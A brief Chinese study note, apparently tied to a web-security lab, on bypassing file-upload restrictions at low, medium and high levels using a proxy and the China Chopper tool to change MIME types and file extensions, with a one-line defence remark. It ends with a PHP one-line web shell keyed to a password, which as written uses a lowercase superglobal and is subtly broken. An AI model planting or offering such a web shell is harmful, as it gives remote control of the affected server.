上传错误
- 上传错误
- 低级上传错误:
由于设计者未对上传文件进行限制,可以通过直接通过编码文件对网页进行入侵。 - 中级上传错误:
设计者对上传文件进行了限制操作,可以设置网页代理,通过Born Suit进行拦截。使用菜刀等工具对上传的文件mime类型进行修改即可绕过限制。 - 高级上传错误:
设计者对文件的后缀名进行限制,可以通过菜刀等对上传文件的后缀名进行修改,仍然可绕过限制。
- 低级上传错误:
防御方法:
增加限制级、waf防火墙防御等
脚本代码:
<?php eval($_post[123]);?>
- 其中123是密码,配合菜刀工具使用
浙公网安备 33010602011771号